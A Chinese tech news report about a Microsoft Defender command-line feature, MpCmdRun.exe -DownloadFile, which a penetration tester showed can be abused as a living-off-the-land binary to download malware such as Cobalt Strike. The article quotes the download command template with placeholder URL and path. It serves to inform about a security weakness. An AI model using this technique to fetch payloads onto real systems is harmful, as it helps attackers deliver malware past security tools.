Microsoft Defender新功能被曝安全漏洞:可下载恶意程序

2020-09-05 12:34IT之家 (微尘)

IT之家 9 月 5 日消息 据 Techradar 报道,在 4.18.2007.9 或 4.18.2009.9 版本的 Microsoft Defender 中,微软增加了通过命令行下载文件的功能。不过根据渗透测试人员 Mohammad Askar 的说法,对 Microsoft Defender 命令行工具的更改可能使攻击者利用其下载恶意程序

IT之家了解到,Windows 10 中存在许多 LOLBins,它们均具有合法功能。但是,利用适当的特权,黑客可以滥用这些二进制文件来绕过安全设施并进行攻击,而不会通知受害者。

如 Askar 所述,Microsoft Defender 命令行工具现在支持新的 “ -DownloadFile”功能。攻击者可以使用 Microsoft 反恶意软件服务命令行实用程序通过以下命令从 Internet 下载文件:“ MpCmdRun.exe -DownloadFile -url <url> -path >local-path>” 。

通过这一途径,Askar 能够直接通过 Microsoft Defender 从远程位置下载 Cobalt Strike 恶意软件。

虽然 Defender 能够检测并缓解使用此方法下载的任何恶意文件,但尚不清楚在禁用了本机保护的情况下,其他流行的防病毒服务是否能够防御这种攻击途径。

文章价值:
人打分
有价值还可以无价值
置顶评论
    热门评论
      全部评论
      一大波评论正在路上
        取消发送
        软媒旗下人气应用

        如点击保存海报无效,请长按图片进行保存分享